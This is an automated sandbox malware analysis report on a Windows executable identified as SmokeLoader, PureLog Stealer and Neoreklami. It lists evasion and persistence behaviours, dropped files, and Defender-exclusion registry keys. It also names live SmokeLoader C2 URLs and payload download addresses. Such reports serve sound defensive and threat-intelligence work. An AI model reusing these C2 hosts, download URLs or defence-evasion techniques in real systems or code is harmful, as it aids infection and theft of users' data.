Windows Analysis Report
lgX7lgUL1w.exe

Overview

General Information

Sample name:	lgX7lgUL1w.exe renamed because original name is a hash value
Original sample name:	7ff8c26a36f5a4566990745dff1594f3.exe
Analysis ID:	1447097
MD5:	7ff8c26a36f5a4566990745dff1594f3
SHA1:	5d73bbd168fb9b1e43051340a415d95f28c40f4d
SHA256:	fc44a0e8161907e73f2e7f0ee5b264a8e2c78f5af3437c4cb25341661da8d813
Tags:	64exetrojan
Infos:

Detection

Neoreklami, PureLog Stealer, SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Benign windows process drops PE files

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

System process connects to network (likely due to code injection or exploit)

Yara detected Neoreklami

Yara detected PureLog Stealer

Yara detected SmokeLoader

Yara detected UAC Bypass using CMSTP

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Adds extensions / path to Windows Defender exclusion list (Registry)

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Changes security center settings (notifications, updates, antivirus, firewall)

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Checks if the current machine is a virtual machine (disk enumeration)

Creates HTML files with .exe extension (expired dropper behavior)

Creates a thread in another existing process (thread injection)

Disable Windows Defender real time protection (registry)

Disables Windows Defender (deletes autostart)

Drops PE files to the document folder of the user

Drops PE files to the user root directory

Drops script or batch files to the startup folder

Exclude list of file types from scheduled, custom, and real-time scanning

Found direct / indirect Syscall (likely to bypass EDR)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Hides threads from debuggers

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Maps a DLL or memory area into another process

Modifies Group Policy settings

Modifies Windows Defender protection settings

PE file contains section with special chars

Query firmware table information (likely to detect VMs)

Sample uses process hollowing technique

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder

Suspicious powershell command line found

Tries to delay execution (extensive OutputDebugStringW loop)

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to harvest and steal browser information (history, passwords, etc)

Uses cmd line tools excessively to alter registry or file data

Uses schtasks.exe or at.exe to add and modify task schedules

Writes many files with high entropy

Writes to foreign memory regions

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Adds / modifies Windows certificates

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Creates job files (autostart)

Creates or modifies windows services

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Modifies existing windows services

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE / OLE file has an invalid certificate

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Use Short Name Path in Command Line

Sigma detected: Windows Defender Exclusions Added - Registry

Stores files to the Windows start menu directory

Stores large binary data to the registry

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Signatures

AV Detection

Antivirus detection for URL or domain

Source: http://45.129.96.86:80/file/update.exe	Avira URL Cloud: Label: malware
Source: https://f.123654987.xyz/525403/setup.exe_	Avira URL Cloud: Label: malware
Source: https://f.123654987.xyz/525403/setup.exev	Avira URL Cloud: Label: malware
Source: http://66.85.156.89/nafdhkdf.exe	Avira URL Cloud: Label: malware
Source: https://monoblocked.com/525403/setup.exe	Avira URL Cloud: Label: malware
Source: https://lop.foxesjoy.com:80/ssl/crt.exeBt	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\8RYSoZQFK6V9LYpTMM1le7yQ.exe	Avira: detection malicious, Label: HEUR/AGEN.1311176
Source: C:\Users\user\AppData\Local\4lBshxehGejQoegWUuOtgGGK.exe	Avira: detection malicious, Label: HEUR/AGEN.1311176
Source: C:\Users\user\AppData\Local\DYOHZPW0D22LInRRNxYgymyV.exe	Avira: detection malicious, Label: HEUR/AGEN.1314708
Source: C:\Users\user\AppData\Local\2nhKzHIgDWCzStH9EAQv4dqj.exe	Avira: detection malicious, Label: HEUR/AGEN.1314708
Source: C:\Users\user\AppData\Local\CwXesQHbkmvSYkF54FDCGs0u.exe	Avira: detection malicious, Label: HEUR/AGEN.1314708
Source: C:\Users\user\AppData\Local\JRER40VeoC2Q4ducOjAkB8be.exe	Avira: detection malicious, Label: HEUR/AGEN.1314708

Found malware configuration

Source: 00000008.00000002.1710200327.0000000002E20000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://dbfhns.in/tmp/index.php", "http://guteyr.cc/tmp/index.php", "http://greendag.ru/tmp/index.php", "http://lobulraualov.in.net/tmp/index.php"]}

Multi AV Scanner detection for domain / URL

Source: https://yip.su/redirect-	Virustotal: Detection: 7%	Perma Link
Source: http://5.42.66.10/download/th/retail.phphp	Virustotal: Detection: 6%	Perma Link
Source: http://45.129.96.86:80/file/update.exe	Virustotal: Detection: 20%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\2nhKzHIgDWCzStH9EAQv4dqj.exe	ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Local\CwXesQHbkmvSYkF54FDCGs0u.exe	ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Local\DYOHZPW0D22LInRRNxYgymyV.exe	ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Local\JRER40VeoC2Q4ducOjAkB8be.exe	ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Local\KFwijURKZUrjToqwGsuVqcsD.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\Default15_s[1].exe	ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\Retailer_prog[1].exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\oiii[1].exe	ReversingLabs: Detection: 45%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\123p[1].exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\default_s[1].exe	ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\SMjkjKVfovgJQv0DVgLWunVz.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\TZazqzIjmIm4XQvcJYbdkOMa.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\7zSA05C.tmp\Install.exe	ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\ED0F.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\VEH3hOo7SH8Curivn14XA2XL.exe	ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Local\aqGWEPmkK0B9sJyfEBtpOpuJ.exe	ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Local\eVDrCR1hP70QTfLbRAKhpUOl.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\gsV4lhPLd9AgpTxUWWWokC1J.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\iMXraNxDRLg4aVOpMn3cNrIf.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\j19ppip6hQlQefTQJUWb1E5Y.exe	ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Local\jRw9sx4Ek0t13Tr93vMM8tJ1.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\o3bvuCFHWJf8oEmP3T0jhkMM.exe	ReversingLabs: Detection: 52%

Multi AV Scanner detection for submitted file

Source: lgX7lgUL1w.exe

Virustotal: Detection: 20%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 83.7% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\8RYSoZQFK6V9LYpTMM1le7yQ.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\4lBshxehGejQoegWUuOtgGGK.exe	Joe Sandbox ML: detected

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: lgX7lgUL1w.exe, type: SAMPLE
Source: Yara match	File source: 0.2.lgX7lgUL1w.exe.233c5000058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.lgX7lgUL1w.exe.7ff7e3570000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lgX7lgUL1w.exe.7ff7e3570000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lgX7lgUL1w.exe.233c5000058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lgX7lgUL1w.exe.233c4d28818.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1201842177.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1213051292.00000233C4D27000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: lgX7lgUL1w.exe PID: 968, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\lgX7lgUL1w.exe, type: DROPPED

Source: C:\Users\user\Pictures\PZ3hKWPffUrXuh6Gjn77Ivv1.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: lgX7lgUL1w.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460357142.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457134681.0000000004DC2000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1458012640.0000000004D51000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1462785010.000000000515A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\x64\Release\XBundlerTlsHelper.pdb source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000000.1290598899.00000001409DF000.00000080.00000001.01000000.0000000E.sdmp
Source:	Binary string: C:\vmagent_new\bin\joblist\806392\out\Release\Installer.pdb source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1334164364.0000000004E44000.00000004.00000020.00020000.00000000.sdmp, xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000003.1335128422.0000000004F05000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: bash.pdbGCTL source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: bash.pdb source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: notepad.pdbGCTL source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: notepad.pdb source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000000.1290598899.0000000140BB1000.00000080.00000001.01000000.0000000E.sdmp
Source:	Binary string: auditpol.pdbGCTL source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\constructicon\builds\gfx\three\20.10\drivers\2d\dal\eeu\atieah\build\wNow64a\B_rel\atieah64.pdb source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000000.1290598899.0000000140BB1000.00000080.00000001.01000000.0000000E.sdmp
Source:	Binary string: F:\workspace\_work\1\s\artifacts\obj\win-x64.Release\corehost\cli\apphost\Release\apphost.pdbhhh source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420338649.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426212707.0000000004460000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426427943.0000000004461000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420528579.0000000004FA0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: F:\workspace\_work\1\s\artifacts\obj\win-x64.Release\corehost\cli\apphost\Release\apphost.pdb source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420338649.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426212707.0000000004460000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426427943.0000000004461000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420528579.0000000004FA0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\vmagent_new\bin\joblist\615425\out\Release\360Installer.pdb0pH\| source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000000.1257115899.0000000000471000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: auditpol.pdb source: iYU7jmLL0jPLxgjctxjq1ReZ.exe, 00000012.00000003.1298739977.00000000020A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\vmagent_new\bin\joblist\615425\out\Release\360Installer.pdb source: xJOdjN6fVDYC0Ta4cXD9JBiF.exe, 00000007.00000000.1257115899.0000000000471000.00000002.00000001.01000000.00000006.sdmp

Change of critical system settings

Adds extensions / path to Windows Defender exclusion list (Registry)

Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{4CD858B3-107C-48BB-950A-EADAAF604C18}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions Exclusions_Extensions
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{4CD858B3-107C-48BB-950A-EADAAF604C18}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions exe

Spreading

Yara detected Neoreklami

Source: Yara match

File source: Process Memory Space: Install.exe PID: 8020, type: MEMORYSTR

Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Code function: 18_2_0040553A FindFirstFileA,		18_2_0040553A
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	Code function: 18_2_004055DE __EH_prolog,FindFirstFileW,AreFileApisANSI,FindFirstFileA,		18_2_004055DE

Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	File opened: C:\Users\user~1\
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	File opened: C:\Users\user~1\AppData\Local\Temp\
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	File opened: C:\Users\user~1\AppData\Local\Temp\7zSA05C.tmp\Install.exe
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	File opened: C:\Users\user~1\AppData\Local\Temp\7zSA05C.tmp\
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	File opened: C:\Users\user~1\AppData\Local\
Source: C:\Users\user\Pictures\iYU7jmLL0jPLxgjctxjq1ReZ.exe	File opened: C:\Users\user~1\AppData\

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 91.202.233.231 80
Source: C:\Windows\explorer.exe	Network Connect: 190.224.203.37 80
Source: C:\Windows\explorer.exe	Network Connect: 45.129.96.86 80
Source: C:\Windows\explorer.exe	Network Connect: 66.85.156.89 80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://dbfhns.in/tmp/index.php
Source: Malware configuration extractor	URLs: http://guteyr.cc/tmp/index.php
Source: Malware configuration extractor	URLs: http://greendag.ru/tmp/index.php
Source: Malware configuration extractor	URLs: http://lobulraualov.in.net/tmp/index.php

Creates HTML files with .exe extension (expired dropper behavior)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: WaSFZllUCVoGMQbapl7iiNhG.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: kIqVtyaJ3Md4voRq7FbxRbNc.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: BuFPDwZaV1iS9PXkCB7kSU2D.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: VwW7Zrgqb8W4pCzz9zGBtVYi.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: QlycVMt9XxnRzBMLYO9bD2Xg.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: fb815uICkCyOkfRy3eesDn62.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: F4U52lR6G7O1cHxteAioycWo.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: 1QmyjDm1eFH0lgBrYiowPc38.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: aQ7CUsrnipUkMOjgF0nKuX1q.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: cIoVbmWEriSiViaXsDVPRBww.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: w4xiNBVLdPuuQzpgLYTzx18Y.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: 2Ik0JEK56ZEfeWSnlWXlxAQH.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: SemaoG1Uwehw633tFAn5ubO2.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: qDDOYpn1QugD92FNbGgaxms8.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: YX45oTvqMEPC5GJFPgqFMHJF.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: RzyrdRTROyDyffduQ1CbhttT.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: S0yywC6t6qDFXXOiN4mRrQOm.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: 8PAbeHuClLlqK8bLhAM9cs8l.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: fqTri05otLw3AgCCHnmdVecS.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: YV2wsGyAOAc9vN2gHfk2THwt.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: Wh0WdTK7FmemcqdqznsDUek0.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: OEf7asb27AljF1U8YK72cN6l.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: 8x9fHtTH22TaURiMTLqQ6qDQ.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: JjDJbN3mgLfy7jfCjajQylmg.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: 7XiHagxRttiQJ0jD8B1KcnGB.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: BoufAyOi6g3dz7fgFn5cKMkk.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: tFMRJ2N4WXQX8R9XoXwDeTd7.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: ECaYsN3ZlPVQpORLp9yKqP3b.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: GEiB3Ddcoc4kuTiV3LIO2ABQ.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: acQeHpiFDRznT8wjZFcvB4qB.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: WAQu9tLKGblXXebB2miyLMLA.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: ZkgAUWW1XaYJAcqvB0QszT7a.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: QdAnaM3mjG9zwvm6YlndB8Yg.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: twwmm95SEd1qhyzlGrhpRq1C.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: yn8qA7eUPrrxMa2hPKWNWLT4.exe.5.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File created: TUdvQ3wmTDhA7WvLZJFgTEvp.exe.5.dr
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: e3VBEHEyvWHF7UQhQQ1Xwuc5.exe.19.dr
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: AaWaOfvGFn1i9dXWYSo7dRjD.exe.19.dr
Source: C:\Users\user\Pictures\c12YwoiQ34lE0LgBRkxJOClX.exe	File created: 49PhL2u6RJaN6gkfIG6mTjtg.exe.19.dr

Yara detected Generic Downloader

Source: Yara match	File source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lgX7lgUL1w.exe.233c776f568.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.lgX7lgUL1w.exe.233c4d28818.0.raw.unpack, type: UNPACKEDPE

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 85.192.56.26 85.192.56.26
Source: Joe Sandbox View	IP Address: 85.192.56.26 85.192.56.26
Source: Joe Sandbox View	IP Address: 87.240.132.78 87.240.132.78
Source: Joe Sandbox View	IP Address: 87.240.132.78 87.240.132.78
Source: Joe Sandbox View	IP Address: 104.192.108.17 104.192.108.17

Source: c12YwoiQ34lE0LgBRkxJOClX.exe	String found in binary or memory: //cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://.yandex.ru https://.google-analytics.com https://.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://.google.com h equals www.facebook.com (Facebook)
Source: c12YwoiQ34lE0LgBRkxJOClX.exe	String found in binary or memory: //cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://.yandex.ru https://.google-analytics.com https://.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://.google.com h equals www.youtube.com (Youtube)
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://.yandex.ru https://.google-analytics.com https://.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://.google.com https://google.com https://.vkpartner.ru https://.moatads.com https://.adlooxtracking.ru https://.serving-sys.ru https://.weborama-tech.ru https://.gstatic.com https://.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://.vk-cdn.net https://.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.c equals www.facebook.com (Facebook)
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1476455435.0000000004460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://.vk.com https://vk.ru https://.vk.ru https://static.vk.me https://.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://.yandex.ru https://.google-analytics.com https://.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://.google.com https://google.com https://.vkpartner.ru https://.moatads.com https://.adlooxtracking.ru https://.serving-sys.ru https://.weborama-tech.ru https://.gstatic.com https://.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://.vk-cdn.net https://.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.c equals www.twitter.com (Twitter)
